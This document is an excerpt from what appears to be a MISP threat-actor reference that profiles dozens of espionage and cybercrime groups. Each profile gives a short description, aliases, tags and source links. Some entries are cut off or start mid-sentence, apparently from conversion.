Shadows in the Cloud documents a complex ecosystem of cyber espionage that systematically compromised government, business, academic, and other computer network systems in India, the Offices of the Dalai Lama, the United Nations, and several other countries. The report also contains an analysis of data which were stolen from politically sensitive targets and recovered during the course of the investigation. These include documents from the Offices of the Dalai Lama and agencies of the Indian national security establishment. Data containing sensitive information on citizens of numerous third-party countries, as well as personal, financial, and business information, were also exfiltrated and recovered during the course of the investigation. The report analyzes the malware ecosystem employed by the Shadows’ attackers, which leveraged multiple redundant cloud computing systems, social networking platforms, and free web hosting services in order to maintain persistent control while operating core servers located in the People’s Republic of China (PRC). Although the identity and motivation of the attackers remain unknown, the report is able to determine the location (Chengdu, PRC) as well as some of the associations of the attackers through circumstantial evidence. The investigation is the product of an eight month, collaborative activity between the Information Warfare Monitor (Citizen Lab and SecDev) and the Shadowserver.
Foundation. The investigation employed a fusion methodology, combining technical interrogation techniques, data analysis, and field research, to track and uncover the Shadow cyber espionage network.

The tag is: **misp-galaxy:threat-actor="Shadow Network"**

### Slingshot

While analysing an incident which involved a suspected keylogger, we identified a malicious library able to interact with a virtual file system, which is usually the sign of an advanced APT actor. This turned out to be a malicious loader internally named ‘Slingshot’, part of a new, and highly sophisticated attack platform that rivals Project Sauron and Regin in complexity. While for most victims the infection vector for Slingshot remains unknown, we were able to find several cases where the attackers got access to MikroTik routers and placed a component downloaded by Winbox Loader, a management suite for MikroTik routers. In turn, this infected the administrator of the router. We believe this cluster of activity started in at least 2012 and was still active at the time of this analysis (February 2018).

The tag is: **misp-galaxy:threat-actor="Slingshot"**

### Taidoor

The Taidoor attackers have been actively engaging in targeted attacks since at least March 4, 2009. Despite some exceptions, the Taidoor campaign often used Taiwanese IP addresses as C&C servers and email addresses to send out socially engineered emails with malware as attachments. One of the primary targets of the Taidoor campaign appeared to be the Taiwanese government. The attackers spoofed Taiwanese government email addresses to send out socially engineered emails in the Chinese language that typically leveraged Taiwan-themed issues. The attackers actively sent out malicious documents and maintained several IP addresses for command and control. As part of their social engineering ploy, the Taidoor attackers attach a decoy document to their emails that, when opened, displays the contents of a legitimate document but executes a malicious payload in the background. We were only able to gather a limited amount of information regarding the Taidoor attackers’ activities after they have compromised a target. We did, however, find that the Taidoor malware allowed attackers to operate an interactive shell on compromised computers and to upload and download files. In order to determine the operational capabilities of the attackers behind the Taidoor campaign, we monitored a compromised honeypot. The attackers issued out some basic commands in an attempt to map out the extent of the network compromise but quickly realized that the honeypot was not an intended targeted and so promptly disabled the Taidoor...
malware running on it. This indicated that while Taidoor malware were more widely distributed compared with those tied to other targeted campaigns, the attackers could quickly assess their targets and distinguish these from inadvertently compromised computers and honeypots.

The tag is: misp-galaxy:threat-actor="Taidoor"

**Table 6145. Table References**

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<td><a href="https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf">https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf</a></td>
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<td><a href="https://attack.mitre.org/groups/G0015/">https://attack.mitre.org/groups/G0015/</a></td>
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**TEMP.Veles**

TEMP.Veles is a Russia-based threat group that has targeted critical infrastructure. The group has been observed utilizing TRITON, a malware framework designed to manipulate industrial safety systems.

The tag is: misp-galaxy:threat-actor="TEMP.Veles"

TEMP.Veles is also known as:

- Xenotime

**Table 6146. Table References**

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<td><a href="https://attack.mitre.org/groups/G0088/">https://attack.mitre.org/groups/G0088/</a></td>
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**WindShift**

In August of 2018, DarkMatter released a report entitled “In the Trails of WINDSHIFT APT”, which unveiled a threat actor with TTPs very similar to those of Bahamut. Subsequently, two additional articles were released by Objective-See which provide an analysis of some validated WINDSHIFT samples targeting OSX systems. Pivoting on specific file attributes and infrastructure indicators, Unit 42 was able to identify and correlate additional attacker activity and can now provide specific details on a targeted WINDSHIFT attack as it unfolded at a Middle Eastern government agency.

The tag is: misp-galaxy:threat-actor="WindShift"

**Table 6147. Table References**

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3616
[Unnamed group]

Over the last few weeks, several significant leaks regarding a number of Iranian APTs took place. After analyzing and investigating the documents we conclude that they are authentic. Consequently, this causes considerable harm to the groups and their operation. The identity of the actor behind the leak is currently unknown, however based on the scope and the quality of the exposed documents and information, it appears that they are professional and highly capable. This leak will likely hamstring the groups' operation in the near future. Accordingly, in our assessment this will minimize the risk of potential attacks in the next few months and possibly even year. Note -most of the leaks are posted on Telegram channels that were created specifically for this purpose. Below are the three main Telegram groups on which the leaks were posted: Lab Dookhtegam pseudonym (“The people whose lips are stitched and sealed” –translation from Persian) –In this channel attack tools attributed to the group 'OilRig' were leaked; including a webshell that was inserted into the Technion, various tools that were used for DNS attacks, and more. Green Leakers–In this channel attack tools attributed to the group 'MuddyWatter' were leaked. The group's name and its symbol are identified with the "green movement", which led the protests in Iran after the Presidential elections in 2009. These protests were heavily repressed by the revolutionary guards (IRGC) Black Box–Unlike the previous two channels this has been around for a long time. On Friday May 5th, dozens of confidential documents labeled as "secret" (a high confidentiality level in Iran, one before the highest -top secret) were posted on this channel. The documents were related to Iranian attack groups' activity.

The tag is: misp-galaxy:threat-actor="[Unnamed group]"

DUNGEON SPIDER

DUNGEON SPIDER is a criminal group operating the ransomware most commonly known as Locky, which has been active since February 2016 and was last observed in late 2017. Locky is a ransomware tool that encrypts files using a combination of cryptographic algorithms: RSA with a key size of 2,048 bits, and AES with a key size of 128 bits. Locky targets a large number of file extensions and is able to encrypt data on shared network drives. In an attempt to further impact victims and prevent file recovery, Locky deletes all of the Shadow Volume Copies on the machine. DUNGEON SPIDER primarily relies on broad spam campaigns with malicious attachments for distribution. Locky is the community/industry name associated with this actor.

The tag is: misp-galaxy:threat-actor="DUNGEON SPIDER"
Fxmsp

Throughout 2017 and 2018, Fxmsp established a network of trusted proxy resellers to promote their breaches on the criminal underground. Some of the known Fxmsp TTPs included accessing network environments via externally available remote desktop protocol (RDP) servers and exposed active directory. Most recently, the actor claimed to have developed a credential-stealing botnet capable of infecting high-profile targets in order to exfiltrate sensitive usernames and passwords. Fxmsp has claimed that developing this botnet and improving its capabilities for stealing information from secured systems is their main goal.

The tag is: `misp-galaxy:threat-actor="Fxmsp"`

Gnosticplayers

The hacker said that he put up the data for sale mainly because these companies had failed to protect passwords with strong encryption algorithms like bcrypt. Most of the hashed passwords the hacker put up for sale today can cracked with various levels of difficulty --but they can be cracked. "I got upset because I feel no one is learning," the hacker told ZDNet in an online chat earlier today. "I just felt upset at this particular moment, because seeing this lack of security in 2019 is making me angry." In a conversation with ZDNet last month, the hacker told us he wanted to hack and put up for sale more than one billion records and then retire and disappear with the money. But in a conversation today, the hacker says this is not his target anymore, as he learned that other hackers have already achieved the same goal before him. Gnosticplayers also revealed that not all the data he obtained from hacked companies had been put up for sale. Some companies gave into extortion demands and paid fees so breaches would remain private. "I came to an agreement with some companies, but the concerned startups won't see their data for sale," he said. "I did it that's why I can't publish the rest of my databases or even name them."

The tag is: `misp-galaxy:threat-actor="Gnosticplayers"`
Hacking Team

The many 0-days that had been collected by Hacking Team and which became publicly available during the breach of their organization in 2015, have been used by several APT groups since. Since being founded in 2003, the Italian spyware vendor Hacking Team gained notoriety for selling surveillance tools to governments and their agencies across the world. The capabilities of its flagship product, the Remote Control System (RCS), include extracting files from a targeted device, intercepting emails and instant messaging, as well as remotely activating a device's webcam and microphone. The company has been criticized for selling these capabilities to authoritarian governments – an allegation it has consistently denied. When the tables turned in July 2015, with Hacking Team itself suffering a damaging hack, the reported use of RCS by oppressive regimes was confirmed. With 400GB of internal data – including the once-secret list of customers, internal communications, and spyware source code – leaked online, Hacking Team was forced to request its customers to suspend all use of RCS, and was left facing an uncertain future. Following the hack, the security community has been keeping a close eye on the company's efforts to get back on its feet. The first reports suggesting Hacking Team's resumed operations came six months later – a new sample of Hacking Team’s Mac spyware was apparently in the wild. A year after the breach, an investment by a company named Tablem Limited brought changes to Hacking Team’s shareholder structure, with Tablem Limited taking 20% of Hacking Team's shareholding. Tablem Limited is officially based in Cyprus; however, recent news suggests it has ties to Saudi Arabia.

The tag is: misp-galaxy:threat-actor="Hacking Team"

OurMine

OurMine is known for celebrity internet accounts, often causing cyber vandalism, to advertise their commercial services. (Trend Micro) In light of the recent report detailing its willingness to pay US$250,000 in exchange for the 1.5 terabytes' worth of data swiped by hackers from its servers, HBO finds itself dealing with yet another security breach. Known for hijacking prominent social media accounts, the self-styled white hat hacking group OurMine took over a number of verified Twitter and Facebook accounts belonging to the cable network. These include accounts for HBO shows, such as “Game of Thrones,” “Girls,” and “Ballers.” This is not the first time that OurMine has
claimed responsibility for hacking high-profile social networking accounts. Last year, the group victimized Marvel, The New York Times, and even the heads of some of the biggest technology companies in the world. Mark Zuckerberg, Jack Dorsey, Sundar Pichai, and Daniel Ek — the CEOs of Facebook, Twitter, Google and Spotify, respectively — have also fallen victim to the hackers, dispelling the notion that a career in software and technology exempts one from being compromised.

The tag is: misp-galaxy:threat-actor="OurMine"

Table 6153. Table References

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<tr>
<td><a href="https://www.grahamcluley.com/despite-appearances-wikileaks-wasnt-hacked/">https://www.grahamcluley.com/despite-appearances-wikileaks-wasnt-hacked/</a></td>
</tr>
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Pacha Group

Antd is a miner found in the wild on September 18, 2018. Recently we discovered that the authors from Antd are actively delivering newer campaigns deploying a broad number of components, most of them completely undetected and operating within compromised third party Linux servers. Furthermore, we have observed that some of the techniques implemented by this group are unconventional, and there is an element of sophistication to them. We believe the authors behind this malware are from Chinese origin. We have labeled the undetected Linux.Antd variants, Linux.GreedyAntd and classified the threat actor as Pacha Group.

The tag is: misp-galaxy:threat-actor="Pacha Group"

Table 6154. Table References

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<tr>
<td><a href="https://www.intezer.com/blog-technical-analysis-pacha-group/">https://www.intezer.com/blog-technical-analysis-pacha-group/</a></td>
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<tr>
<td><a href="https://www.intezer.com/blog-technical-analysis-cryptocurrency-mining-war-on-the-cloud/">https://www.intezer.com/blog-technical-analysis-cryptocurrency-mining-war-on-the-cloud/</a></td>
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Rocke

This threat actor initially came to our attention in April 2018, leveraging both Western and Chinese Git repositories to deliver malware to honeypot systems vulnerable to an Apache Struts vulnerability. In late July, we became aware that the same actor was engaged in another similar campaign. Through our investigation into this new campaign, we were able to uncover more details about the actor.

The tag is: misp-galaxy:threat-actor="Rocke"
An unnamed source leaked almost 10,000 documents describing a large number of 0-day vulnerabilities, methodologies and tools that had been collected by the CIA. This leaking was done through WikiLeaks, since March 2017. In weekly publications, the dumps were said to come from Vault 7 and later Vault 8, until his arrest in 2018. Most of the published vulnerabilities have since been fixed by the respective vendors, by many have been used by other threat actors. This actor turned out to be a former CIA software engineer. (WikiLeaks) Today, Tuesday 7 March 2017, WikiLeaks begins its new series of leaks on the U.S. Central Intelligence Agency. Code-named "Vault 7" by WikiLeaks, it is the largest ever publication of confidential documents on the agency. The first full part of the series, "Year Zero", comprises 8,761 documents and files from an isolated, high-security network situated inside the CIA's Center for Cyber Intelligence in Langley, Virgina. It follows an introductory disclosure last month of CIA targeting French political parties and candidates in the lead up to the 2012 presidential election. Recently, the CIA lost control of the majority of its hacking arsenal including malware, viruses, trojans, weaponized "zero day" exploits, malware remote control systems and associated documentation. This extraordinary collection, which amounts to more than several hundred million lines of code, gives its possessor the entire hacking capacity of the CIA. The archive appears to have been circulated among former U.S. government hackers and contractors in an unauthorized manner, one of whom has provided WikiLeaks with portions of the archive. "Year Zero" introduces the scope and direction of the CIA’s global covert hacking program, its malware arsenal and dozens of "zero day" weaponized exploits against a wide range of U.S. and European company products, include Apple's iPhone, Google’s Android and Microsoft's Windows and even Samsung TVs, which are turned into covert microphones.

The tag is: \textit{misp-galaxy:threat-actor=}[Vault 7/8]
actor behind a botnet known as Kelihos and its predecessors, Waledac and Storm. In addition to Levashov’s arrest, there was a technical operation conducted by Falcon Intelligence to seize control of the Kelihos botnet.

The tag is: misp-galaxy:threat-actor="ZOMBIE SPIDER"

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**ViceLeaker**

In May 2018, we discovered a campaign targeting dozens of mobile Android devices belonging to Israeli citizens. Kaspersky spyware sensors caught the signal of an attack from the device of one of the victims; and a hash of the APK involved (Android application) was tagged in our sample feed for inspection. Once we looked into the file, we quickly found out that the inner-workings of the APK included a malicious payload, embedded in the original code of the application. This was an original spyware program, designed to exfiltrate almost all accessible information. During the course of our research, we noticed that we were not the only ones to have found the operation. Researchers from Bitdefender also released an analysis of one of the samples in a blogpost. Although something had already been published, we decided to do something different with the data we acquired. The following month, we released a private report on our Threat Intelligence Portal to alert our clients about this newly discovered operation and began writing YARA rules in order to catch more samples. We decided to call the operation “ViceLeaker”, because of strings and variables in its code.

The tag is: misp-galaxy:threat-actor="ViceLeaker"

---

**SWEED**

Cisco Talos recently identified a large number of ongoing malware distribution campaigns linked to a threat actor we’re calling "SWEED," including such notable malware as Formbook, Lokibot and Agent Tesla. Based on our research, SWEED — which has been operating since at least 2017 — primarily targets their victims with stealers and remote access trojans. SWEED remains consistent across most of their campaigns in their use of spear-phishing emails with malicious attachments. While these campaigns have featured a myriad of different types of malicious documents, the actor primarily tries to infect its victims with a packed version of Agent Tesla — an information stealer that’s been around since at least 2014. The version of Agent Tesla that SWEED is using differs
slightly from what we've seen in the past in the way that it is packed, as well as how it infects the system. In this post, we'll run down each campaign we're able to connect to SWEED, and talk about some of the actor’s tactics, techniques and procedures (TTPs).

The tag is: misp-galaxy:threat-actor="SWEED"

Table 6159. Table References

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**TA428**

Proofpoint researchers have identified a targeted APT campaign that utilized malicious RTF documents to deliver custom malware to unsuspecting victims. We dubbed this campaign “Operation LagTime IT” based on entities that were targeted and the distinctive domains registered to C&C IP infrastructure. Beginning in early 2019, these threat actors targeted a number of government agencies in East Asia overseeing government information technology, domestic affairs, foreign affairs, economic development, and political processes. We determined that the infection vector observed in this campaign was spear phishing, with emails originating from both free email accounts and compromised user accounts. Attackers relied on Microsoft Equation Editor exploit CVE-2018-0798 to deliver a custom malware that Proofpoint researchers have dubbed Cotx RAT. Additionally, this APT group utilizes Poison Ivy payloads that share overlapping command and control (C&C) infrastructure with the newly identified Cotx campaigns. Based on infrastructure overlaps, post-exploitation techniques, and historic TTPs utilized in this operation, Proofpoint analysts attribute this activity to the Chinese APT group tracked internally as TA428. Researchers believe that this activity has an operational and tactical resemblance to the Maudi Surveillance Operation which was previously reported in 2013.

The tag is: misp-galaxy:threat-actor="TA428"

Table 6160. Table References

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**LYCEUM**

The tag is: misp-galaxy:threat-actor="LYCEUM"

LYCEUM is also known as:

- COBALT LYCEUM

Table 6161. Table References

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<tr>
<td><a href="https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign">https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign</a></td>
</tr>
</tbody>
</table>
APT41

APT41 is a prolific cyber threat group that carries out Chinese state-sponsored espionage activity in addition to financially motivated activity potentially outside of state control.

The tag is: misp-galaxy:threat-actor="APT41"

APT41 has relationships with:

- uses: misp-galaxy:backdoor="Speculoos" with estimative-language:likelihood-probability="very-likely"

Table 6162. Table References

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<tr>
<td><a href="https://unit42.paloaltonetworks.com/apt41-using-new-speculoos-backdoor-to-target-organizations-globally/">https://unit42.paloaltonetworks.com/apt41-using-new-speculoos-backdoor-to-target-organizations-globally/</a></td>
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SectorJ04

SectorJ04 is a Russian-based cybercrime group that began operating about five years ago and conducted hacking activities for financial profit using malware such as banking trojans and ransomware against national and industrial sectors located across Europe, North America and West Africa. In 2019, the SectorJ04 group expanded its hacking activities to cover various industrial sectors located across Southeast Asia and East Asia, and is changing the pattern of their attacks from targeted attacks to searching for random victims. This report includes details related to the major hacking targets of the SectorJ04 group in 2019, how those targets were hacked, characteristics of their hacking activities this year and recent cases of the SectorJ04 group's hacking.

The tag is: misp-galaxy:threat-actor="SectorJ04"

Tortoiseshell

A previously undocumented attack group is using both custom and off-the-shelf malware to target IT providers in Saudi Arabia in what appear to be supply chain attacks with the end goal of compromising the IT providers' customers. The group, which we are calling Tortoiseshell, has been active since at least July 2018. Symantec has identified a total of 11 organizations hit by the group, the majority of which are based in Saudi Arabia. In at least two organizations, evidence suggests that the attackers gained domain admin-level access.

The tag is: misp-galaxy:threat-actor="Tortoiseshell"

Tortoiseshell is also known as:
POISON CARP

Between November 2018 and May 2019, senior members of Tibetan groups received malicious links in individually tailored WhatsApp text exchanges with operators posing as NGO workers, journalists, and other fake personas. The links led to code designed to exploit web browser vulnerabilities to install spyware on iOS and Android devices, and in some cases to OAuth phishing pages. This campaign was carried out by what appears to be a single operator that we call POISON CARP.

The tag is: `misp-galaxy:threat-actor="POISON CARP"`

POISON CARP is also known as:

- Evil Eye

TA410

Early in August 2019, Proofpoint described what appeared to be state-sponsored activity targeting the US utilities sector with malware that we dubbed “Lookback”. Between August 21 and August 29, 2019, several spear phishing emails were identified targeting additional US companies in the utilities sector. The phishing emails originated from what appears to be an actor-controlled domain: globalenergycertification[.]net. This domain, like those used in previous campaigns, impersonated a licensing body related to the utilities sector. In this case, it masqueraded as the legitimate domain for Global Energy Certification (“GEC”). The emails include a GEC examination-themed body and a malicious Microsoft Word attachment that uses macros to install and run LookBack. (Note confusion between Malware, Campaign and ThreatActor)

The tag is: `misp-galaxy:threat-actor="TA410"`

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Operation Soft Cell

In 2018, the Cybereason Nocturnus team identified an advanced, persistent attack targeting global telecommunications providers carried out by a threat actor using tools and techniques commonly associated with Chinese-affiliated threat actors, such as APT10. This multi-wave attacks focused on obtaining data of specific, high-value targets and resulted in a complete takeover of the network.

The tag is: misp-galaxy:threat-actor="Operation Soft Cell"

Operation Soft Cell has relationships with:

- similar: misp-galaxy:threat-actor="GALLIUM" with estimative-language:likelihood-probability="almost-certain"

Operation WizardOpium

We are calling these attacks Operation WizardOpium. So far, we have been unable to establish a definitive link with any known threat actors. There are certain very weak code similarities with Lazarus attacks, although these could very well be a false flag. The profile of the targeted website is more in line with earlier DarkHotel attacks that have recently deployed similar false flag attacks.

The tag is: misp-galaxy:threat-actor="Operation WizardOpium"

Calypso group

For the first time, the activity of the Calypso group was detected by specialists of PT Expert Security Center in March 2019, during the work to detect cyber threats. As a result, many malware samples of this group were obtained, affected organizations and control servers of intruders were identified. According to our data, the group has been active since at least September 2016. The main
The goal of the group is to steal confidential data, the main victims are government agencies from Brazil, India, Kazakhstan, Russia, Thailand, Turkey. Our data suggest that the group has Asian roots. Description translated from Russian.

The tag is: misp-galaxy:threat-actor="Calypso group"

Calypso group is also known as:

- Calypso
- Calypso APT

Table 6168. Table References

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**TA2101**

Proofpoint researchers detected campaigns from a relatively new actor, tracked internally as TA2101, targeting German companies and organizations to deliver and install backdoor malware. The actor initiated their campaigns impersonating the Bundeszentralamt fur Steuern, the German Federal Ministry of Finance, with lookalike domains, verbiage, and stolen branding in the emails. For their campaigns in Germany, the actor chose Cobalt Strike, a commercially licensed software tool that is generally used for penetration testing and emulates the type of backdoor framework used by Metasploit, a similar penetration testing tool. Proofpoint researchers have also observed this actor distributing Maze ransomware, employing similar social engineering techniques to those it uses for Cobalt Strike, while also targeting organizations in Italy and impersonating the Agenzia Delle Entrate, the Italian Revenue Agency. We have also recently observed the actor targeting organizations in the United States using the IcedID banking Trojan while impersonating the United States Postal Service (USPS).

The tag is: misp-galaxy:threat-actor="TA2101"

TA2101 is also known as:

- Maze Team
- TWISTED SPIDER
- GOLD VILLAGE

Table 6169. Table References

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<tr>
<td><a href="https://adversary.crowdstrike.com/adversary/twisted-spider/">https://adversary.crowdstrike.com/adversary/twisted-spider/</a></td>
</tr>
</tbody>
</table>
APT-C-34

As reported by ZDNet, Chinese cyber-security vendor Qihoo 360 published a report on 2019-11-29 exposing an extensive hacking operation targeting the country of Kazakhstan. Targets included individuals and organizations involving all walks of life, such as government agencies, military personnel, foreign diplomats, researchers, journalists, private companies, the educational sector, religious figures, government dissidents, and foreign diplomats alike. The campaign, Qihoo 360 said, was broad, and appears to have been carried by a threat actor with considerable resources, and one who had the ability to develop their private hacking tools, buy expensive spyware off the surveillance market, and even invest in radio communications interception hardware.

The tag is: *misp-galaxy:threat-actor=*"APT-C-34"

APT-C-34 is also known as:

- Golden Falcon

Golden RAT

Since November 2014, the Golden Rat Organization (APT-C-27) has launched an organized, planned and targeted long-term uninterrupted attack on the Syrian region. The attack platform has gradually expanded from the beginning of the Windows platform to the Android platform.

The tag is: *misp-galaxy:threat-actor=*"Golden RAT"

Golden RAT is also known as:

- APT-C-27
**luoxk**

Luoxk is a malware campaign targeting web servers throughout Asia, Europe and North America.

The tag is: `misp-galaxy:threat-actor="luoxk"`

**BRONZE PRESIDENT**

The activities of some non-governmental organizations (NGOs) challenge governments on politically sensitive issues such as social, humanitarian, and environmental policies. As a result, these organizations are often exposed to increased government-directed threats aimed at monitoring their activities, discrediting their work, or stealing their intellectual property. BRONZE PRESIDENT is a likely People's Republic of China (PRC)-based targeted cyberespionage group that uses both proprietary and publicly available tools to target NGO networks. Secureworks® Counter Threat Unit (CTU) researchers have observed BRONZE PRESIDENT activity since mid-2018 but identified artifacts suggesting that the threat actors may have been conducting network intrusions as far back as 2014.

The tag is: `misp-galaxy:threat-actor="BRONZE PRESIDENT"`

**SideWinder**

An actor mainly targeting Pakistan military targets, active since at least 2012. We have low confidence that this malware might be authored by an Indian company. To spread the malware, they use unique implementations to leverage the exploits of known vulnerabilities (such as CVE-2017-11882) and later deploy a Powershell payload in the final stages.

The tag is: `misp-galaxy:threat-actor="SideWinder"`

SideWinder is also known as:

- RAZOR TIGER
- Rattlesnake
- APT-C-17
- T-APT-04

SideWinder has relationships with:
Operation Wocao

Operation Wocao (我操, “Wǒ cáo”, used as “shit” or “damn”) is the name that Fox-IT uses to describe the hacking activities of a Chinese based hacking group. This report details the profile of a publicly underreported threat actor that Fox-IT has dealt with over the past two years. Fox-IT assesses with high confidence that the actor is a Chinese group and that they are likely working to support the interests of the Chinese government and are tasked with obtaining information for espionage purposes. With medium confidence, Fox-IT assesses that the tools, techniques and procedures are those of the actor referred to as APT20 by industry partners. We have identified victims of this actor in more than 10 countries, in government entities, managed service providers and across a wide variety of industries, including Energy, Health Care and High-Tech.

The tag is: `misp-galaxy:threat-actor="Operation Wocao"`

Budminer

Based on the evidence we have presented Symantec attributed the activity involving the Dripcion malware to the Budminer advanced threat group. While we have not seen new campaigns using Taidoor malware since 2014, we believe the Budminer group has changed tactics to avoid detection.
after being outed publicly in security white papers and blogs over the past few years.

The tag is: `misp-galaxy:threat-actor="Budminer"`

Budminer is also known as:

- Budminer cyberespionage group

**Table 6176. Table References**

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<tr>
<td><a href="https://app.box.com/s/xqh458fe1url7mgl072hhd0yxqw3x0jm">https://app.box.com/s/xqh458fe1url7mgl072hhd0yxqw3x0jm</a></td>
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**Attor**

Adversary group targeting diplomatic missions and governmental organisations.

The tag is: `misp-galaxy:threat-actor="Attor"`

**Table 6177. Table References**

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<td><a href="https://www.welivesecurity.com/2019/10/10/eset-discovers-attor-spy-platform">https://www.welivesecurity.com/2019/10/10/eset-discovers-attor-spy-platform</a></td>
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**APT-C-12**

According to 360 TIC the actor has carried out continuous cyber espionage activities since 2011 on key units and departments of the Chinese government, military industry, scientific research, and finance. The organization focuses on information related to the nuclear industry and scientific research. The targets were mainly concentrated in mainland China...[M]ore than 670 malware samples have been collected from the group, including more than 60 malicious plugins specifically for lateral movement; more than 40 C2 domain names and IPs related to the organization have also been discovered.

The tag is: `misp-galaxy:threat-actor="APT-C-12"`

APT-C-12 is also known as:

- Sapphire Mushroom
- Blue Mushroom
- NuclearCrisis

**Table 6178. Table References**

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InvisiMole

Adversary group targeting diplomatic missions, governmental and military organisations, mainly in Ukraine.

The tag is: misp-galaxy:threat-actor="InvisiMole"

ANTHROPOID SPIDER

Publicly known as 'EmpireMonkey', ANTHROPOID SPIDER conducted phishing campaigns in February and March 2019, spoofing French, Norwegian and Belizean financial regulators and institutions. These campaigns used macro-enabled Microsoft documents to deliver the PowerShell Empire post-exploitation framework. ANTHROPOID SPIDER likely enabled a breach that allegedly involved fraudulent transfers over the SWIFT network.

The tag is: misp-galaxy:threat-actor="ANTHROPOID SPIDER"

ANTHROPOID SPIDER is also known as:

- Empire Monkey
- CobaltGoblin

CLOCKWORD SPIDER

Opportunistic actor that installs custom root certificate on victim to support man-in-the-middle network monitoring.

The tag is: misp-galaxy:threat-actor="CLOCKWORD SPIDER"
DOPPEL SPIDER

In June 2019, CrowdStrike Intelligence observed a source code fork of BitPaymer and began tracking the new ransomware strain as DoppelPaymer. Further technical analysis revealed an increasing divergence between two versions of Dridex, with the new version dubbed DoppelDridex. Based on this evidence, CrowdStrike Intelligence assessed with high confidence that a new group split off from INDRIK SPIDER to form the adversary DOPPEL SPIDER. Following DOPPEL SPIDER's inception, CrowdStrike Intelligence observed multiple BGH incidents attributed to the group, with the largest known ransomware demand being 250 BTC. Other demands were not nearly as high, suggesting that the group conducts network reconnaissance to determine the value of the victim organization.

The tag is: misp-galaxy:threat-actor="DOPPEL SPIDER"

DOPPEL SPIDER is also known as:

- GOLD HERON

MONTY SPIDER

Spambots continued to decline in 2019, with MONTY SPIDER's CraP2P spambot falling silent in April.

The tag is: misp-galaxy:threat-actor="MONTY SPIDER"

NARWHAL SPIDER

NARWHAL SPIDER's operation of Cutwail v2 was limited to country-specific spam campaigns, although late in 2019 there appeared to be an effort to expand by bringing in INDRIK SPIDER as a
customer.

The tag is: misp-galaxy:threat-actor="NARWHAL SPIDER"

NARWHAL SPIDER is also known as:

- GOLD ESSEX
- TA544

Table 6184. Table References

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<tr>
<td><a href="http://www.secureworks.com/research/threat-profiles/gold-essex">http://www.secureworks.com/research/threat-profiles/gold-essex</a></td>
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NOCTURNAL SPIDER

Mentioned as MaaS operator in CrowdStrike’s 2020 Report.

The tag is: misp-galaxy:threat-actor="NOCTURNAL SPIDER"

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SCULLY SPIDER

Mentioned as operator of DanaBot in CrowdStrike’s 2020 Report.

The tag is: misp-galaxy:threat-actor="SCULLY SPIDER"

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SMOKY SPIDER

Mentioned as operator of SmokeLoader in CrowdStrike’s 2020 Report.

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VENOM SPIDER

VENOM SPIDER is the developer of a large toolset that includes SKID, VenomKit and Taurus Loader. Under the moniker ‘badbullzvenom’, the adversary has been an active member of Russian underground forums since at least 2012, specializing in the identification of vulnerabilities and the subsequent development of tools for exploitation, as well as for gaining and maintaining access to victim machines and carding services. Recent advertisements for the malware indicate that VENOM SPIDER limits the sale and use of its tools, selling modules only to trusted affiliates. This preference can be seen in the fact that adversaries observed using the tools include the targeted criminal adversary COBALT SPIDER and BGH adversaries WIZARD SPIDER and PINCHY SPIDER.

The tag is: misp-galaxy:threat-actor="VENOM SPIDER"

VENOM SPIDER is also known as:

- badbullzvenom

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Operation Shadow Force

Operation Shadow Force is a group of malware that is representative of Shadow Force and Wgdrop from 2013 to 2020, and is a group activity that attacks Korean companies and organizations. The group’s first confirmed attack was in March 2013, but considering the date of malware creation, it is likely to have been active before 2012. Since the malware used mainly by them is Shadow Force, it was named Operation Shadow Force, and it has not been confirmed whether the attacker is associated with a known group.

The tag is: misp-galaxy:threat-actor="Operation Shadow Force"

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NOTROBIN

Researchers at FireEye report finding a hacking group (dubbed NOTROBIN) that has been bundling mitigation code for NetScaler servers with its exploits. In effect, the hackers exploit the flaw to get access to the server, kill any existing malware, set up their own backdoor, then block off the vulnerable code from future exploit attempts by mitigation.

The tag is: `misp-galaxy:threat-actor="NOTROBIN"`

Table 6190. Table References

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<td><a href="https://www.theregister.co.uk/2020/01/17/hackers_patchCitrix_vulnerability/">https://www.theregister.co.uk/2020/01/17/hackers_patchCitrix_vulnerability/</a></td>
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<td><a href="https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html">https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html</a></td>
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ItaDuke

ItaDuke is an actor known since 2013. It used PDF exploits for dropping malware and Twitter accounts to store C2 server urls. On 2018, an actor named DarkUniverse, which was active between 2009 to 2017, was attributed to this ItaDuke by Kaspersky.

The tag is: `misp-galaxy:threat-actor="ItaDuke"`

ItaDuke is also known as:

- DarkUniverse
- SIG27

Table 6191. Table References

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<tr>
<td><a href="https://www.fireeye.com/blog/threat-research/2013/02/the-number-of-the-beast.html">https://www.fireeye.com/blog/threat-research/2013/02/the-number-of-the-beast.html</a></td>
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Nazar

This actor was identified by Juan Andres Guerrero-Saade from the SIG37 cluster as published in the ShadowBrokers' 'Lost in Translation' leak. Earliest known sighting potentially dates back to as far as 2008 with a confirmed center of activity around 2010-2013. The actor name is derived from a PDB debug string fragment: 'khzer'. Victimology indicates targeting of Iran, assessed with low confidence based on VT file submission locations. Nazar employs a modular toolkit where a main dropper silently registers multiple DLLs as OLE controls in the Windows registry. Functionality
includes keylogging, sound and screen grabbing, as well as traffic capture using the MicroOlap Packet Sniffer library.

The tag is: `misp-galaxy:threat-actor="Nazar"`

Nazar is also known as:

- SIG37

### Higaisa

The organization often uses important North Korean time nodes such as holidays and North Korea to conduct fishing activities. The bait includes New Year blessings, Lantern blessings, North Korean celebrations, and important news, overseas personnel contact lists and so on. In addition, the attack organization also has the attack capability of the mobile terminal. The targets of the attack also include diplomatic entities related to North Korea (such as embassy officials in various places), government officials, human rights organizations, North Korean residents abroad, and traders. The victim countries currently monitored include China, North Korea, Japan, Nepal, Singapore, Russia, Poland, Switzerland, etc.

The tag is: `misp-galaxy:threat-actor="Higaisa"`

### COBALT JUNO

